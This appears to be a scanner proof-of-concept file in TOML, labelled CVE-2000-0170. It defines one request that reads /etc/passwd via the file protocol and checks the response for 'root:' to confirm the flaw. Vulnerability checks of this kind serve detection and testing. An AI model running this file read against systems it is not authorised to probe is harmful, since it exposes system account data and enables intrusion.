[info]
author = "AVE"
description = "检测目标与利用方式"
id = "POC-AVE-2000-0149"
name = "CVE-2000-0170 PoC"
severity = "high"
tags = ["cve-2000-0170"]
vuln_id = [
    "CVE-2000-0170",
    "AVE-2000-0149",
]

[poc]
logic = "all"

[[poc.requests]]
path = "/etc/passwd"
protocol = "file"

[[poc.requests.matchers]]
expect = true
part = "body"
type = "word"
words = ["root:"]
